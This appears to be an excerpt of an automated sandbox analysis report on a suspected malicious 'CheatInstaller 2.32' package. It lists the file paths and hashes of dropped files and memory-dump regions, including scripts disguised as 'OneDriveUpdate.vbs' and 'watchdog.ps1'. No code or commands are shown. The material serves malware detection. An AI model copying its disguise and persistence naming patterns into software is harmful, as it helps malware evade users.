SHA256 86cad2a008f8a7be294be384100f6c0cc0cc4bbdb154174b81ea8c61bc85748e
SHA512 0b897b0697b3beb69dbe22db514ce53f3fb0b456fc14b79e4719b840bf17165a594a052230f2242647cf0fc047b4066461aa5af5289d5869926d16189dc8f005

C:\Users\Admin\AppData\Local\Temp\progressgood.bat

MD5 845cf6630a4a8d184f93d0f732feb846
SHA1 1d9219177aaf25e5a95bdc72ec8cd6fd42e6cace
SHA256 19f3274b5b004259d609e624e54259d1637074a97ab7e6452ddd2bd81ee29153
SHA512 bb6e45187eb464ba6eec05c368ea13c43667307804b10215b5753209fb8d1cdacf0b1fb3460849069211ac76b8706c772f85704b7b7361626798cce373bdac1e

memory/3476-3665-0x00007FFC1B8C0000-0x00007FFC1C381000-memory.dmp

C:\Windows\Installer\MSI9D71.tmp

MD5 2557173f4299722afce46cc3c0616406
SHA1 b0343c9a9552be977834e415783b486c4714fe97
SHA256 e25369e33c7ef36151769a86d833189b275f85045f35873e9e931547e0a6d591
SHA512 24a46359cb8e22534cbd875fe092d096e3280ca4c24936159894ba95832233ee318494a3eabbdf73ae6010e39a1b5897b4488b2771b416b472bb7f60ceddf40e

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\real_sc09.wav

MD5 642050477d06a0a9e3d32703cec998ed
SHA1 fad8f6e1f4bac09c9f5d94ac85b2018d197af588
SHA256 6d9b201d91066459d50cdd9022e5720c0d9a3c7164b53204a65232d6f9a7d25a
SHA512 1e32a316d76e5d7b6a5e14082fc2094ec40ce8f83906d98b613627b99f1bc0289417fde71691246a53896e25d77c0dd72e183503305826375cba963b87618712

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\quant_wavegan_pp.wav

MD5 e215783b1d3c7050d69d205face5be82
SHA1 3ef774a5074af433f135d1a6565d3713a5444615
SHA256 23a9b2fca444070e59664895c39de6e6d6f4b9186323f8a280d6e8d0e2c53d28
SHA512 40fb36669fa9fdfd0ba18fab2dedd9e4f6a9df881ddcaa1a04d5e1d2cc11c35eadc67f05e3ea373ec8f6329ca681e478c819ae3e89a9f53e521bd865b533b951

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\event.csv

MD5 2620f56f03159589486b831d9b6adc4a
SHA1 55dfc135be75692bd64c50b429dcd5460e0b0b90
SHA256 8438f31c41c8214d92ef0227b0e45eae937e6e5221e410af1ad3735dc9e2ee71
SHA512 2915b402391b79635679f415c085646fa3fa6a888b4d00ee9be8aac101760815df6dd390b76192c5d695a116dfd2d297a1e3323b678b184e320049061b974f01

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\gl_sc09.wav

MD5 5e3277d45653e0cc5895a1355d1b691e
SHA1 7f1bad0213bf9bb1e90e503143bd40e207028a53
SHA256 58908bb18cd51a70d9669c941b3abdcfbad60e88035c2f43ce6a776068cf91e4
SHA512 55ddf8f76af471bacdb37fe9324594a7339c2ff0016dacc0f939d29c93272bc9c4cbb04ac1d029bb11185f53ccc06b6f23165b2f94a39f5b84f626f344e4d1eb

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\lang_ita.txt

MD5 89e2a161df2ef245781707ff93e978bc
SHA1 ab2189d5c8dca09cade0586b929f0264c327db32
SHA256 b8f747babf732bb64a9cfc60a09b79001c87eb3b37d9704174c0964a49ed6f4a
SHA512 0e78e380198330cb143b17490d4540473d359a0198888dfd59ff5b1a94a8637f0e6e8998d2ea6ef83794d41771db449bb4abdc2692872a21ebd7d585652b4115

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\specgan_timit.wav

MD5 50ef295bd5d596d5edf3d2905e4f5020
SHA1 99ba82071df6b5790e92ccb9588fbcc9f92d4458
SHA256 f64a825a0ad6f97060458532a61c3620e2fd71eefbe80149761abfb146fc4907
SHA512 9b67d85def8732960a377646a0ddc98bddcd7e2578f7ddb7047acb07e62483cd8707f594f6e93f78c67729917c96af5f13c7aa37bbad3505c9b5f93e7e93a9aa

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\db.frm

MD5 ac330f2a89a6c828059d1f125cb9cb60
SHA1 a40b10eae1fba1ea43ff70b3941a165d6d0502f2
SHA256 9b2123a554181148e29bbeb66f18da5619b1fd796e4f3de49415748822fef4ec
SHA512 0fd4ac721c969496423c336128c8b3751f3752176c891d85e13cbfc226fcfa00751aab1d1d400ee6b70031b6abaa86fb975f45f30b6c0e8789df27904dedcc42

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\LocalAppDataFolder\watchdog.ps1

MD5 beceb9c4ac840a5ac0b51d8774e63149
SHA1 ea375fee5ff404065ba724e877c9a9b01509353b
SHA256 d2011dcd715dad784b01709bd0af62c07a91aad758f6e461005178a74c2d3b34
SHA512 48e705691523f9804e152433c15142757def6e8dfa72f5dd08169576f7a5073d5e43cce1e148f7df19a566fb863cd377adfcdbeab5308b4cafe9afec9715365d

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\LocalAppDataFolder\OneDriveUpdate.vbs

MD5 214ee30dbd649af9294f254fc8c33d07
SHA1 e81a7486c5c19868abb7d39fc757f686c4124662
SHA256 d9747024f7951c01c90b39e18ebe0a490a956625422f165d53f917ae062c4e52
SHA512 f1309c116fcaa64b372946686c3a22b0574db717aef91c095fbb70cbeb4125077f363ad9ce0d4a9ec12bc9f61d61df8ef35f5ac20a6a8b9f68b95203b5f93d19

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\lang_fre.txt

MD5 5b1a12edc7b4e82163e5b39694e5b630
SHA1 088d6df18ce940cf01789a27adeaa150f9dc26b7
SHA256 206bac7b50b6bd8467ccffcb6d0833c4c8c58a2e82d205f608d4127ddc3402c9
SHA512 07846ad52962fc7f07b9e950343f906db5ac09287ced6d4659dae5f99f3fc8ee02916d66557dc2a0a7edbca0a716d8b26c252642558417986532cc28428494cc

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\wavegan_piano.wav

MD5 f5a15308c911a4dd71a3f5413c95173f
SHA1 0f6cb55164561f21d7e1b08485f185e7eedac4ec
SHA256 940aa068efbbe3eb0363f0c146ef8d7fefc0060fc9ea2271f896f822a8e3df07
SHA512 2f144e62d7ed06912a6d065afbacfec857ffc6d1e0d73b69432bb36f6da199f6be1fc68f5d5a08043425c209f77a000659b246b2baa32d56e65991edb2f4eba3

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\slow_log.frm

MD5 5cf177c70e9be2f41adc86ea7e0fc48b
SHA1 9a597f4d25a0fb4837fa06b9b3792de65fae9551
SHA256 9276bfd579b31e71a0f85e8b1085e6f00aafc1428b3c5dee2e765e80c34260a3
SHA512 054f52c54dd936a87ad49f1b31fbf248962ad6909686a98e3b76c6772f7ffbb09e6ecb336c3ff6499eadd45746e407c90992fe5e93f44d0e7feee4cab1e071a1

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\help_relation.MYI

MD5 b7d1f26327bf857bf6ce98ea4fda22b1
SHA1 b3f9c0dd62d5a7f533be36664f8e4954cd1f216d
SHA256 7ce3f6771b4c0a0c0e662dc51ecb460aae223bb3292eaea6c1c6f1bb805b3786
SHA512 91e83b2a3aa885e240f2634d15662954aa0d1104b85ae7bf33948b6bcffcbf763baddb3ecdabd15de53d6eda23d765716891b4dbaaf70168b837480f055e5ab2

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\db.MYI

MD5 f0bb4307afbd586f0499f4023213863d
SHA1 cd978f445f02aab75b1d89c5e28e348860d8c306
SHA256 49a2cd5ce74b5969db3eb785c02fda21f207672b2348c95252b3200d05281129
SHA512 a4327e9535d84ad98b4880764a05141170febf1c02d3fb74f71d704185e8176545c15ecfa34e5c8218cc33f4b7f07deb1fe0f2c06c1b400a3798a75016de861c

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\real_tatum.wav

MD5 b53c332e24d821b2d7817bd62118a92a
SHA1 9805ea6b4af265297a998aef49d7c862a16ec179
SHA256 9b4a0377fe4a757b85ec9cb0c43e180dfab2d2f8702d1492907179cf7ac84e98
SHA512 9aab681ad4a62f261c1b2f89ec89f4c297a06482cbf8a0466aa94aeceeaed56d26318d18cd654dbdd9fa4b4debe266f4ee20f49a6f92ade0f2719a2d317bbdc1

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\quant_samplernn.wav

MD5 5acab132e4baf883d7f785fabf624952
SHA1 dcd1e3fe209cea31e72531e1484b6bb156347308
SHA256 e14563629a67f07764f12cfae343d8ddb0309cbda241391d095fbb6109302dd1
SHA512 714ed7d425424006fbf248c2e5b95e6525f4abc6e563ecf544fe52f12881af7cf8bd73e790657766e545e753c23f1bd363dde8b6faba675bca147a22cc802c3c

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\specgan_birds.wav

MD5 14a7caa1686f3c11b214b6863973feae
SHA1 abc5196c995d004ade0951c670d3a4e2c5ca63fd
SHA256 177f67457eb949ccd9d73cb6c8684069ed498f8cbb44436d3b6c1f56cc2438db
SHA512 3c891f4924cda7201134ed851dba917dec833e6105fdd61c0557ec553da0218de6a0df339021ca2dee5741c7b6636c93bf7a5be8b26f44c8c094ecf537078c94

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\gl_drums.wav

MD5 4ba12c952dfe9e09e443aa80ef67f60a
SHA1 c31cf5db9668ec67877e078c9c9c17338362cae9
SHA256 49ca291fcc1f01696f5a112a5f3cc7aaaa2d22f6f4b9f2061d90ab3a7cadd4f2
SHA512 41547bb09988468b848b34aa33078ec681afa622d0f0ca8249784199389af265cc96ae3971635b22983a94e5e8fc9b47b8d0438bbb2b9feb69c91a867798fd95

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\gl_birds.wav

MD5 903696350c0d94889f0c4d23caae9cc6
SHA1 3abf03ef88e4d77fe587967d583f947fcbf96cc3
SHA256 505b1e90504c53918ff16c9e6dd487b908f6328205b94ca97a461aa016d25db6
SHA512 36db5d816c57303ad09b549de5f3d47bce0a165331b5edfc0c9c1a6a82554c79b063ac14687588d7b91b48556b2099cec6652d530b183b5b1add8653aa3795cb

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\help_topic.frm

MD5 ccaca741f4002cb8af48d485501ec8e9
SHA1 4895716a9baf869a5ba2ec1c2d0523b7bc8a6cb3
SHA256 0e2099aa021c0a2819f8f80960d729e66f69754675bfe847af8923029a330ec1
SHA512 09f005f1e7e8f9f388031c673a593c8afac42298b6f97ff708babfbc403a952692a0bbfbab3ebbd89f8506c2ec7bdb4154f70827680b6dfd390f80054ff2910a

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\general_log.frm

MD5 ea26bb989e3e2c321a47d499d2682ae1
SHA1 a79e8c99186c20fb09f1457b3d183538e1e1b1bb
SHA256 4a208c39ac55c440fa336c3463428609db81112512f6551a1331a516a2d1da81
SHA512 07f2b43db67b76b463c1770dd6ddb445bbcefcd8f8dfb85e9c28306cf5282272805516dd3166851b66a8358e16632a09a524d6918aae8711d97939beda53137e

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\gl_timit.wav

MD5 ebb95ec1997199704a9a48c87c007276
SHA1 c34c3d8531d04ea151d25a24edfdc862f399bc2c
SHA256 3893d9fd5a0ac9f76c55180f6b466e46fa6d2e09d45e5fbbe1f6c2d9f54d0cfb
SHA512 8bc262d3c38fe5ae83fd131a15dcf8bf53cb4f5d09a59be9d836626a8ff1e641be46ff0eed2d40881562cbabdfb25573dcce74a12db1464678325db42116a31c

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\gl_piano.wav

MD5 bba03e42f2871bc9deb12451caa32c50
SHA1 c734bc4576e6604aa1f3c99fe2829f23317c6054
SHA256 033061b0a63d34ba12309defa53084e174ec09d38486a747a5e0270a97b70fab
SHA512 109b25b75e76504917c06241d585c3375fafbbf31192cdbf9b72c564c4d2d09a2c550d248663f3fedec0283e6ed2a8b13c4d472023d935d1ba7a8c734dcf6e82

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\quant_parametric.wav

MD5 400cfb51654fb1972b516a25a25bbf62
SHA1 dc7b39e19d7f435fcf7e9c80819fe6f2152bb9e8
SHA256 ef01da01838d5c5d1740480db205b82a0b737fde52e4163b3afacae78aaad1aa
SHA512 50e3391699466d7511ff89f97813b1de7740b8ced589112d520388ac7e654ee46334556e28830162ca4b489cf343ffed337eda73aec83107ce4f41078df158ec

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\quant_wavegan_ps4.wav

MD5 fc855d290bfd306ceed49b14cfaddbad
SHA1 2e8f12d469d6941124a45d689c216fd750db68e4
SHA256 41f36db5d048afde593e9b05bdd1019f0a67d3933465336b35f53aab6cef7bae
SHA512 a179d654035ad9079c157c7e24e3d51228585826042f78672f0e69e8e7e2fc27cc479f26f2fd50122c10e15fa1fdba410c386884f18dc805a89ebdfadf97c511

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\quant_specgan.wav

MD5 2a148391595c9f8b95790d8939a0ab4a
SHA1 4de9751dbde389ac570c0d477358463773708c98
SHA256 510ae5c147104cfc974e8ebf8adeff76c8859ee564b66ccc3ce2da825c541631
SHA512 042abedb76b521478545063e640a61073ab23df6f78725e25a57b5300cbc8a61dde2dfb564f0301b58d36f226e92180927f45efc46dfee7abd667a1ebde04b2b

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\quant_wavenet_r9y9.wav

MD5 de80a8ba4a0b0715feba0891081cdf46
SHA1 cb931c5869dc3cde780bfa73f5568d5e795d6434
SHA256 88ce097e6256936bf747ed71ccbee03628dca327d05a631a3863359d306b3df3
SHA512 3771cc888bfa19579bf96d7a2685af514f064dd52a8c4059fed0f4464ebefbc9343c3acec966fe56769ef027da4f8249704c280870b66dc329abf68f699104ce

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\quant_wavegan_ps2.wav

MD5 055a70deba436841f43697b9ef867f9a
SHA1 4b2d9e8f84b97380c39db5c16651fda754bbff2c
SHA256 aa74a1bd9439f232faa7733de366ac164165d237902a1d0e457d7cf630478731
SHA512 f8bfde44cd707ada6e01c01264b922f225cb733a92053fda106b7477fe44c25a023d2d0e9707fbb75058a991e3e1c7e415c569374acfb0811e80acfcb162fc1d

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\real_birds.wav

MD5 151d9bcc93c5aff3aa165e4ee7932d91
SHA1 864f6f4175c14b9df40f19b7d9ef5b018e4fc6eb
SHA256 a7cef2cbe628d960d11511861a065f100ebdd14e7a40a7fda2b7abe80255ccda
SHA512 73bcec54b8ebd5f59a78e15b1d41d4786d869245aee011b5b064327ed756e46cd348a2a24f15a4503e18c0a9fa89ac004729a7d0543e9b24319be49402399a44

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\real_drums.wav

MD5 8ba1a9230d1bbbae8c2fa4947356fb34
SHA1 4da45c292edfcb1324a10f1e5471e39e1e3abfb3
SHA256 d3f2122ca802fa1541f07126c11b9a994bd52670a56932c346ff498400dedaf0
SHA512 09567402b073b8187be12333a1cbe37f727e1152f56d18509cc0ccd5a24e59d9c6d16b6d26b606c14fd213b0c09d8c822cc77cf70501026704bba8cacda77c3f

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\real_piano.wav

MD5 30bfb22bc7b282e1b871de71e952fb5e
SHA1 e3246f9fb981badf2701dfe2ac25d0280b9a16af
SHA256 216825c7ccf0d214f830b8adbc3e7b0ddcda07e76275145a3a4abdf372bb2459
SHA512 e83ba330f92734f84edf1d1cc151c81c3433c147c5ab2eddb315f9ea9b0dc013c22f74d574b2841ad59b2806379e99565ba4e6df9df9e4e0e6111b2c4017d1e5

C:\Windows\Installer\MSIAF1B.tmp

MD5 cac17c92ed0d30bc68ce60905e0af1ea
SHA1 29589b5816214f537ffb03a4ff9c79f1bd25908b
SHA256 e5a59959b68626f622c7a27b2a42468dbfe03a6d956b58b2cdccedf0a632d161
SHA512 041aab2032745c2f800ac05ee77073167bf37f81dee56774b498c8f1b60fdcc8f16904e909ed42ef9157dfebeada9998d5c155aa1a10df1ccd608177425acc20

C:\Windows\Installer\MSIB028.tmp

MD5 165f730f078c7019ea5f2642f8208cda
SHA1 370f2e4d1f298b62c1d4743d0e23d2a2d41f950d
SHA256 48f509d74ca1afa44b3053e5fb0ddc15d56ca8844e9d150419891c5a38a071a6
SHA512 36868c499b28f96853fb77a1dacef2ad2a06ee7b1be41ff2782ac0f90dd247f522dc64951fa72bb77a85d930ddffe28b06eb391e5bf803e396adaa7211c183b6

memory/1844-3840-0x0000000002870000-0x00000000028A6000-memory.dmp

memory/1844-3843-0x0000000005030000-0x0000000005658000-memory.dmp

memory/1844-3842-0x0000000071440000-0x0000000071BF0000-memory.dmp

memory/1844-3844-0x00000000049F0000-0x0000000004A00000-memory.dmp

memory/1844-3845-0x00000000049F0000-0x0000000004A00000-memory.dmp

memory/1844-3846-0x0000000004E90000-0x0000000004EB2000-memory.dmp

memory/1844-3847-0x0000000005760000-0x00000000057C6000-memory.dmp

memory/1844-3848-0x00000000057D0000-0x0000000005836000-memory.dmp

memory/1844-3858-0x0000000005940000-0x0000000005C94000-memory.dmp

memory/1176-3865-0x000001F87F600000-0x000001F87F610000-memory.dmp

memory/1176-3870-0x000001F87F600000-0x000001F87F610000-memory.dmp

memory/1176-3859-0x00007FFC1B8C0000-0x00007FFC1C381000-memory.dmp

memory/1844-3871-0x0000000005E50000-0x0000000005E6E000-memory.dmp

memory/1844-3872-0x0000000005FA0000-0x0000000005FEC000-memory.dmp

memory/1176-3874-0x00007FFC1B8C0000-0x00007FFC1C381000-memory.dmp

memory/4908-3885-0x000001DACDBC0000-0x000001DACDBD0000-memory.dmp

memory/4908-3884-0x00007FFC1B8C0000-0x00007FFC1C381000-memory.dmp

memory/4908-3886-0x000001DACDBC0000-0x000001DACDBD0000-memory.dmp

memory/4908-3888-0x00007FFC1B8C0000-0x00007FFC1C381000-memory.dmp

memory/3696-3890-0x000001A6A51E0000-0x000001A6A51F0000-memory.dmp

memory/3696-3891-0x000001A6A51E0000-0x000001A6A51F0000-memory.dmp

memory/3696-3889-0x00007FFC1B8C0000-0x00007FFC1C381000-memory.dmp

memory/1844-3901-0x00000000075C0000-0x0000000007C3A000-memory.dmp

memory/1844-3902-0x0000000006390000-0x00000000063AA000-memory.dmp

memory/3696-3904-0x00007FFC1B8C0000-0x00007FFC1C381000-memory.dmp

memory/1844-3905-0x0000000006F40000-0x0000000006FD6000-memory.dmp

memory/1844-3906-0x0000000006E10000-0x0000000006E32000-memory.dmp

memory/1844-3907-0x0000000007C40000-0x00000000081E4000-memory.dmp

memory/3604-3908-0x00007FFC1B8C0000-0x00007FFC1C381000-memory.dmp

memory/3604-3909-0x000001D0EB0C0000-0x000001D0EB0D0000-memory.dmp

memory/3604-3910-0x000001D0EB0C0000-0x000001D0EB0D0000-memory.dmp

memory/1844-3911-0x0000000071440000-0x0000000071BF0000-memory.dmp

memory/1844-3921-0x00000000073C0000-0x0000000007452000-memory.dmp

memory/3604-3923-0x00007FFC1B8C0000-0x00007FFC1C381000-memory.dmp

memory/5148-3924-0x00007FFC1B8C0000-0x00007FFC1C381000-memory.dmp

memory/1844-3925-0x00000000049F0000-0x0000000004A00000-memory.dmp

memory/1844-3937-0x00000000049F0000-0x0000000004A00000-memory.dmp

memory/5604-3938-0x00007FFC1B8C0000-0x00007FFC1C381000-memory.dmp

memory/5604-3939-0x000001F891AA0000-0x000001F891AB0000-memory.dmp

memory/5604-3940-0x000001F891AA0000-0x000001F891AB0000-memory.dmp

memory/1844-3950-0x0000000071440000-0x0000000071BF0000-memory.dmp

C:\Windows\Installer\MSI479A.tmp

MD5 11358529600bd8c403949b280aaf6696
SHA1 edcb74b03de9fed51d1bffc6d47f8e058fbb6964
SHA256 d236c058d5c81604f969cdb606834ef46b857ee03b9232bf62620b6b99135ab9
SHA512 1f1e2a8508154624b8c635c7719e9719d59e8c21f2d8a00ba30e5e2e995a681ccca89d3f454ed35e24fd7ac3d1d202312940b286766eacf1ce02c58122e94231

C:\Windows\Installer\MSI47BB.tmp

MD5 370b1214bc7b9eef4d79a4661ebb714e
SHA1 2839db09316d4a4d8a6fd909d89612bc99b37843
SHA256 6ec2963630debc20449b3f360a0076c523e20e30211ea7fae4c349d344d9f332
SHA512 d39daf8cc639772c0dacce4a4145e0acf6ea03e10502095972f060357597f80f83a9e02c4579ceffecb0d4887b347a4883be018fdcd15383ad5a349be0f03e3e

C:\Windows\Installer\MSI4897.tmp

MD5 18db7a45912d1664716efdf6e311f5f1
SHA1 24a5d1d2addf8095e6f5e4040a2e1c44956bb141
SHA256 5ffa59b2cb0995af80de9ce944bb3e2933c42cea0d764c0af137ff842dc7fd0c
SHA512 5bc3db53b113d9098170eac6ac1fd2327e6e02f6e5e5e6a5c48e861e1ff683fd2a88928638a0f046a8b89488d6ce1f9eba9952aa34b5ab0858f671b890f250ff

C:\Config.Msi\e5794d1.rbs

MD5 67727a70768138fe4579721eba722671
SHA1 898d9c2918209ce917d5e5524975e9f90c0a44e7
SHA256 158874ce3cda54e68e1003e94f4471283736924a08cd208cba460189e8420c1e
SHA512 6804fac05209f579bf13e88a41cef23d38510a870390aa1b95bd2285addf4fcda44365adc617ca67329f8dfc3b00266b43bf2f2dfdc78a17f446abacf8ba9f88

C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\node_modules\@npmcli\git\LICENSE

MD5 a7a567b0c15ef6f269b858ec3b85eb11
SHA1 1f3474ea2534827d050295aede1e340868483d12
SHA256 565acf764f4583abe4cf4b02128f01b5d4d1b4c62c253e92df7ed6a8a8ad406b
SHA512 61ee613b7ce22b8149ed7e54e9919172db70a2254ddd30645488b6240f943d8b6524ab54043ce9af0f1b3dd6eb7674966e69dcafbb710211d9c20a42e5dc7c1f

C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\node_modules\@sigstore\sign\dist\util\json.js

MD5 b15d152ff80150e679cee7f441091b36
SHA1 02a44a2b9cd6c19b1af7cdd0b7043747cdba72f0
SHA256 cb3adb661fd056e40c147d0036e854dd742630a61935810ce03f9e5ba2ce2afe
SHA512 7203e1a533676f6d0efb1df990ad4fe012e5a1b71ff6aa4b9ca3b7b9f9c497b7db8edf002f00b38c31cae5ca288a3af3bd5428a194b2a8ada616955078cf4233

C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\node_modules\@isaacs\cliui\node_modules\strip-ansi\package.json

MD5 a1a0019976c3f4994c816df2eb411962
SHA1 323ec71c0cdb2dfdcf717f3e324f0b77981d7c58
SHA256 01cee5e384d1e26843021c1f91bc05ed009e14c2d31c01349a374e64d3416e7d
SHA512 59cbf6d8b3e7eface2b660fae651afbe054a1aa0348f817559fb12ce22ca1648cc9a021196e8f6a6d37ae3d2eb0772d2d40b1e531db3f3deb6776a189d167f69

C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\node_modules\cidr-regex\LICENSE

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\node_modules\cross-spawn\node_modules\which\which.js

MD5 2f112ac3fed09f7bc11e3f78c096e435
SHA1 cfb29894630a310ff6d56c91ee327a076ced7179
SHA256 76845e1fe7851267fb7ee72b18f2d916996d330150e31e48f4657a79e9b46b5b
SHA512 6e5617ff8dcdacdb444a61fb55aae7d19dd6addd175dc299bd20e8a6e1bf13ee105f53dac49033d0775561714b0093a88ecd9e865bdb8ddd7bb7bbe9ef990214

C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\node_modules\emoji-regex\index.js

MD5 0438b0678667b951cf518a14560fa0b7
SHA1 e678799abbf2035d94ab0114ae0783b36a3e5994
SHA256 c56978800e47f095cfbfe96712b5e78d150d1f62e32bb4943675213fce481ef0
SHA512 75924c24968e298b1496170a66624b97a76a77fb4ce5968e7c097ad227401256752d9d28c8a1f84d313ce4b06f9dc9b20e3f75d81398c8951b45375ccb013e3e

C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\node_modules\glob\LICENSE

MD5 72480347f4e847c91bbe6207b7567338
SHA1 1696f694a30db0edfd6874f6d7794efbe23236fc
SHA256 cdbc258d13806538e727964c2436a8806e6e2496ccd616224aace6f7bf98dbc1
SHA512 3ad7417dda1ae4d8f8c388f97d0b37f4757d3385c04a267b74b18ccb5abea901124d9c088f110ebe119e90310829c723f8d7f32de5a887ef3155d6130983e43c

memory/6068-5743-0x00007FFC1B8C0000-0x00007FFC1C381000-memory.dmp

memory/6068-5458-0x000001ACD64F0000-0x000001ACD6C38000-memory.dmp

memory/6068-6045-0x000001ACD7020000-0x000001ACD7030000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\node_modules\node-gyp\node_modules\brace-expansion\package.json

MD5 effd91994b1b7ddb8a33060ad4541e6a
SHA1 a3c20e6ee1cae1c72f9ac87e6f2d1fd2a4254b37
SHA256 62de2d264aad4f27c5cf09f3c6bebc2aa2cacb0a2aa23342c3cde3c2b3910b2e
SHA512 64fbfd022ad04771b999161fab553ffa7ae50812be94f8a944f99fef643b26d74b6f889c63dfb29b6f50a66e0f0c4d6702ce1d6e6f95540eb8ff2058ca589bbc

C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\node_modules\node-gyp\node_modules\brace-expansion\index.js

MD5 2e265baed5f4147160f144389684af9c
SHA1 a2f937621d39c20ce582f697c3e4273d1e14b2e0
SHA256 6bf9eee39229aa68ac3e6a71177c387c8321eff1f83242a35f3e7c35cb9eec1b
SHA512 044ebca50298a99635636da73aa30b2f1de64fc580dde3cad93a7017b663fa389723cda0760c5bc2ce3e99ae3d49cfac707188576171e565c3f22c578a7439fd

C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\node_modules\node-gyp\node_modules\readable-stream\LICENSE

MD5 a67a7926e54316d90c14f74f71080977
SHA1 d3622fac093fe1cbcb4d8e8d35801600b681fc45
SHA256 ec62dc96da0099b87f4511736c87309335527fb7031639493e06c95728dc8c54
SHA512 e61de704d5a76afd66b5d9b1c78f0a5afe9a846686ca2fb28c814a4a60dbe82a190ed4a6a2f31e09bf6d695b8ec178ebea9804593029c58c1b1bedd793324d13

C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\node_modules\node-gyp\node_modules\minipass\package.json

MD5 0073ff5b8b418f84c67edd912ffab39e
SHA1 f351144cafb23a2e78d442708fcbcfdcd4c5420f
SHA256 280af43113a60826e63a6bf79e115fdf5f89d5866f663cdde3d229640671cee1
SHA512 eaf4015aa2e5a705e85edf3761c0b23daf8232d71ce30c508832ab0ef45a0b211b2deef468ae4faaa52ec701a36f485a3e50d035373345267b9041f585a1b242

memory/6060-6893-0x0000000000A40000-0x0000000000D7E000-memory.dmp

memory/6060-7182-0x0000000071440000-0x0000000071BF0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\node_modules\strip-ansi\package.json

MD5 6a0c65b4bd6c6b9cd068e2232eef50d9
SHA1 892d549c672831716abe655f087946d2644f2852
SHA256 0130850b9da0584f54cc20d3dab6365c807e9436ac78e016d5009efa99bd0530
SHA512 724a1e498671494c22ba929060058b5539acd34b839d263c9058a07333cda543d5c77435a0a6f13f76adb2f32bb93fa2683f8089245dbc4c8815bde17168ebb7

memory/6060-7483-0x00000000056D0000-0x0000000005954000-memory.dmp

memory/6052-7484-0x0000000005030000-0x00000000052A6000-memory.dmp

memory/6060-7501-0x00000000056D0000-0x000000000594F000-memory.dmp

memory/6068-7482-0x000001ACF1300000-0x000001ACF1A40000-memory.dmp

memory/6052-7504-0x0000000005030000-0x00000000052A0000-memory.dmp

memory/6052-7502-0x0000000005030000-0x00000000052A0000-memory.dmp

memory/6060-7503-0x00000000056D0000-0x000000000594F000-memory.dmp

memory/6060-7508-0x00000000056D0000-0x000000000594F000-memory.dmp

memory/6052-7512-0x0000000005030000-0x00000000052A0000-memory.dmp

memory/6068-7517-0x000001ACF1A40000-0x000001ACF217B000-memory.dmp

memory/6068-7514-0x000001ACF1A40000-0x000001ACF217B000-memory.dmp

memory/6052-7518-0x0000000005030000-0x00000000052A0000-memory.dmp

memory/6060-7519-0x00000000056D0000-0x000000000594F000-memory.dmp

memory/6052-7524-0x0000000005030000-0x00000000052A0000-memory.dmp

memory/6068-7523-0x000001ACF1A40000-0x000001ACF217B000-memory.dmp

memory/6068-7529-0x000001ACF1A40000-0x000001ACF217B000-memory.dmp

